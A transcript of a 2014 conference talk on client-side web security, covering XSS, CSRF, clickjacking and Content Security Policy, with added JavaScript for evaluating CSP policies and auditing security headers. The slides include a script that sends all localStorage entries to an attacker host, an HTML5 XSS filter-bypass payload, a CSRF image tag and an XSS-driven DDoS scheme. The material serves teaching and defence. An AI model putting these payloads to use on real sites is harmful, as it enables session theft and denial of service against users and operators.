Cyber Security Conference '14 - Client-Side Security & CSP (1)
TRANSCRIPT
End-User Security & CSP
Mehmet Dursun İNCE
mince@rootlab ~ $ whoami
Mehmet Dursun İNCE
Penetration Tester at IntelRAD
Vulnerability Researcher
Blog author: www.mehmetince.net
Linux & Open Source
PHP, Python, ...
mince@rootlab ~ $ cat icerik.txt
What is Client-Side Security?
CSRF, XSS and ClickJacking
Web Browsers
HTML5
SKiddieTrapper.js & CryptoPost.js
What is End-User Security?
● It is not just SSL.
● It requires secure "session" management.
● User interface security.
Popular Cyber Threats Targeting End Users
● ...
● XSS
● CSRF
● Clickjacking
● ...
XSS
XSS is not just <script>alert(1)</script>.
It is about the Browser, not the COOKIE.
XSS Dangers - Password Cracking
● HTML5 - WebWorker
● Cracking speed: 609,384 / sec (MD5)
● Ravan - JavaScript Distributed Computing System
XSS Dangers - L7 DDoS
● XMLHttpRequest - WebSockets
● www.hedef.com/?search="a"+"b"
● 10,000 / min
XSS Dangers - Demo - Step 1
● http://www.hacker.com/ddos.js
XSS Dangers - Demo - Step 2
● The ddos.js file is placed, via Stored XSS or a similar method, on a web site that receives 100 unique users per minute.
● For example: e-commerce sites, newspaper/news sites.
● Social engineering + advertising (JS!)?
XSS Dangers - Demo - Step 3
● Chrome users visiting http://lab.mehmetince.net.
XSS Dangers - Demo - Step 3
● The request will reach the server; reading the returned value and acting on it is forbidden!
XSS Dangers - Demo - Result
● On average, each browser sends 10,000 requests / minute
● Through the visitors of a site that receives 100 unique users per minute:
● Total ≃ 1,200,000 / minute
● = 200,000 / second
● WAF? Firewall?
CSRF - Cross Site Request Forgery
Summary - HTTP GET:
…<img src="//site.com/sing_out">…
CSRF - Cross Site Request Forgery
Summary - HTTP POST:
CSRF - Demo - Step 1
1. Target: users of an e-commerce site.
2. The current password is not requested when a user changes their e-mail address.
3. CSRF tokens are not used anywhere in the application.
CSRF - Demo - Step 2
1. The following CSRF exploit code is placed on www.herhangibirsite.com.
CSRF - Demo - Step 3.1
A user who visits www.herhangibirsite.com unknowingly sends the HTTP request that changes their e-mail address.
CSRF - Demo - Step 3.2
EMAIL VERIFICATION
CSRF - Demo - Step 4
FORGOT MY PASSWORD
ClickJacking
ClickJacking - Mitigation
X-Frame-Options: DENY, SAMEORIGIN
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
HTML5 Advantages
● Blacklist Bypass
○ ...
○ <video poster=javascript:alert(1)//></video>
○ …
HTML5 Local Storage

```html
<!-- A sensitive value is written to localStorage and then rendered through innerHTML -->
<script>
  localStorage.setItem("email", "[email protected]");
  var f = document.getElementById("email");
  f.innerHTML = localStorage.getItem("email");
</script>
```
HTML5 Local Storage

```html
<!-- What an injected script can do with that storage: every key/value pair is leaked
     through an image request to a server the attacker controls. Unlike a cookie,
     localStorage has no HttpOnly equivalent, so any XSS on the origin can read it. -->
<script>
  for (var i = 0; i < localStorage.length; i++) {
    var key = localStorage.key(i);
    var a = new Image();
    a.src = "http://saldirgan/kaydet.php?key=" + key + "&value=" + localStorage.getItem(key);
  }
</script>
```
Content Security Policy
Content Security Policy - Features
connect-src : WebSocket, XHR, EventSource
font-src : https://themes.googleusercontent.com
frame-src : https://youtube.com
img-src : * -allow everything-
media-src : *.site.com
object-src : self -Flash etc.-
script-src : 'self' 'unsafe-eval' 'unsafe-inline'
style-src : self
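How a browser applies these source lists is easiest to see by running loads through them. The following is an added example (not code from the talk) of a small CSP source-list evaluator in JavaScript: `parseCsp()` turns a header value into a directive map, and `isLoadAllowed()` decides whether a page at a given origin may load a URL under the directive that governs that load type, falling back to `default-src`. It is checked against the localStorage exfiltration image load from the previous slide (`http://saldirgan/kaydet.php?...`) under the policy on this slide and under a hardened one. Two things it makes visible: `img-src *` lets that exfiltration request out, and an unquoted `self` (as in `object-src : self` and `style-src : self` above) is parsed as a hostname called "self", not as the `'self'` keyword, so it matches nothing. The page origin `https://www.site.com`, the policies and the URLs are constructed; nonces, hashes, `'strict-dynamic'` and path matching are not implemented.

```javascript
// Added example, not from the talk: evaluate CSP source lists against candidate loads.
const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };
const NETWORK_SCHEMES = Object.keys(DEFAULT_PORTS);

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // Per spec the first occurrence of a directive wins; later duplicates are ignored.
    if (name && !(name.toLowerCase() in policy)) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function hostMatches(pattern, hostname) {
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) {
    const suffix = pattern.slice(1); // "*.site.com" -> ".site.com"; does not match site.com itself
    return hostname.endsWith(suffix) && hostname.length > suffix.length;
  }
  return pattern === hostname;
}

function sourceMatches(source, url, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return url.origin === pageOrigin;
  if (src.startsWith("'")) return false; // 'unsafe-inline', 'unsafe-eval', nonces, hashes: not URL sources
  if (src === "*") return NETWORK_SCHEMES.includes(url.protocol); // '*' excludes data:, blob:, etc.
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return url.protocol === src; // scheme-source such as https:
  // host-source: [scheme://]host[:port][/path]; the path part is ignored here.
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?/.exec(src);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme ? url.protocol !== scheme + ":" : !NETWORK_SCHEMES.includes(url.protocol)) return false;
  if (!hostMatches(host, url.hostname)) return false;
  if (port && port !== "*" && port !== (url.port || DEFAULT_PORTS[url.protocol])) return false;
  return true;
}

function isLoadAllowed(policy, directive, urlString, pageOrigin) {
  const url = new URL(urlString);
  // Fetch directives fall back to default-src; with neither present the load is unrestricted.
  const sources = policy[directive] ?? policy["default-src"];
  if (sources === undefined) return true;
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Constructed: the slide's policy beside a hardened one, checked against the
// localStorage exfiltration image load and a few ordinary loads.
const PAGE_ORIGIN = "https://www.site.com";
const EXFIL_IMAGE = "http://saldirgan/kaydet.php?key=email&value=x";
const talkPolicy = parseCsp(
  "img-src *; media-src *.site.com; object-src self; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src self"
);
const hardenedPolicy = parseCsp(
  "default-src 'none'; script-src 'self'; img-src 'self'; style-src 'self'; media-src *.site.com; font-src https://themes.googleusercontent.com"
);

function exfilAllowed(policy) {
  return isLoadAllowed(policy, "img-src", EXFIL_IMAGE, PAGE_ORIGIN);
}

console.log("exfil image under slide policy:", exfilAllowed(talkPolicy)); // true
console.log("exfil image under hardened policy:", exfilAllowed(hardenedPolicy)); // false
console.log("own stylesheet under 'style-src self':",
  isLoadAllowed(talkPolicy, "style-src", "https://www.site.com/app.css", PAGE_ORIGIN)); // false
```

Note that `default-src` only covers fetch directives; `frame-ancestors`, `report-uri` and the like have no fallback, which is why the hardened policy starts from `default-src 'none'` and opens each load type explicitly.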
Content Security Policy - Example
Facebook CSP Example
Content Security Policy - Reporting
script-src : 'self'
report-uri : 'log.php'
X-XSS-Protection
X-XSS-Protection: 1; mode=block
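The three headers recommended on the preceding slides (X-Frame-Options, Content-Security-Policy with a report-uri, X-XSS-Protection) are easy to set and easy to get subtly wrong. The following is an added example (not code from the talk) of a response-header audit in JavaScript: it takes a header map from a captured response and returns a list of findings, flagging a missing or non-DENY/SAMEORIGIN X-Frame-Options, a missing CSP, script sources that allow `'unsafe-inline'`, `'unsafe-eval'` or `*`, an unquoted `self`, a policy with no `report-uri`/`report-to`, and an X-XSS-Protection value other than `1; mode=block`. Two caveats a practitioner should keep in mind: `report-uri` takes an unquoted URI, not the quoted `'log.php'` shown on the slide, and X-XSS-Protection is a legacy header whose filter current Chrome and Edge no longer implement and Firefox never did, so it must not be the only XSS control. The header sets in `sampleResults()` are constructed.

```javascript
// Added example, not from the talk: audit the security headers of a captured HTTP response.
function auditSecurityHeaders(headers) {
  // Header names are case-insensitive; normalise them once.
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const findings = [];

  // Clickjacking: X-Frame-Options must be DENY or SAMEORIGIN (ALLOW-FROM is obsolete).
  const xfo = h["x-frame-options"];
  if (xfo === undefined) {
    findings.push("X-Frame-Options missing: page can be framed by any site");
  } else if (!["DENY", "SAMEORIGIN"].includes(xfo.trim().toUpperCase())) {
    findings.push(`X-Frame-Options value "${xfo}" is not DENY or SAMEORIGIN`);
  }

  // CSP: must exist, must restrict scripts, must not allow inline/eval, and should report violations.
  const csp = h["content-security-policy"];
  if (csp === undefined) {
    findings.push("Content-Security-Policy missing");
  } else {
    const directives = Object.fromEntries(
      csp.split(";").map((d) => d.trim().split(/\s+/)).filter((t) => t[0]).map(([n, ...s]) => [n.toLowerCase(), s])
    );
    const scriptSrc = directives["script-src"] ?? directives["default-src"];
    if (scriptSrc === undefined) {
      findings.push("CSP has neither script-src nor default-src: scripts are unrestricted");
    } else {
      const lowered = scriptSrc.map((s) => s.toLowerCase());
      for (const kw of ["'unsafe-inline'", "'unsafe-eval'", "*"]) {
        if (lowered.includes(kw)) findings.push(`CSP script sources allow ${kw}`);
      }
    }
    // An unquoted self is a host named "self", not the 'self' keyword.
    for (const [name, sources] of Object.entries(directives)) {
      if (sources.includes("self")) findings.push(`CSP ${name} uses unquoted self: that is a hostname, not 'self'`);
    }
    if (!("report-uri" in directives) && !("report-to" in directives)) {
      findings.push("CSP has no report-uri/report-to: violations are not reported");
    }
  }

  // Legacy XSS-auditor header: only "1; mode=block" is the recommended form; a value of 0 disables it.
  const xxp = h["x-xss-protection"];
  if (xxp !== undefined && xxp.replace(/\s+/g, "").toLowerCase() !== "1;mode=block") {
    findings.push(`X-XSS-Protection value "${xxp}" is not "1; mode=block"`);
  }
  return findings;
}

// Constructed sample responses: the slide's permissive policy beside a hardened header set.
function sampleResults() {
  const weak = {
    "Content-Security-Policy": "img-src *; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src self",
  };
  const hardened = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; object-src 'none'; report-uri /log.php",
    "X-XSS-Protection": "1; mode=block",
  };
  return { weak: auditSecurityHeaders(weak), hardened: auditSecurityHeaders(hardened) };
}

console.log(sampleResults()); // weak: 5 findings; hardened: none
```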
CryptoPost.js
● RSA key encryption
● Encrypting POST parameters.
● A countermeasure against hackers and MITM attacks.
● Open source and open to pull requests.
● https://github.com/mmetince/crypto_post
SKiddieTrapper.js
● Setting traps for potential attackers.
● Injects inputs into FORMs.
● Open source and open to pull requests.
● https://github.com/mmetince/skiddie_trapper
SKiddieTrapper.js
Thank You
● www.mehmetince.net
● twitter.com/mmetince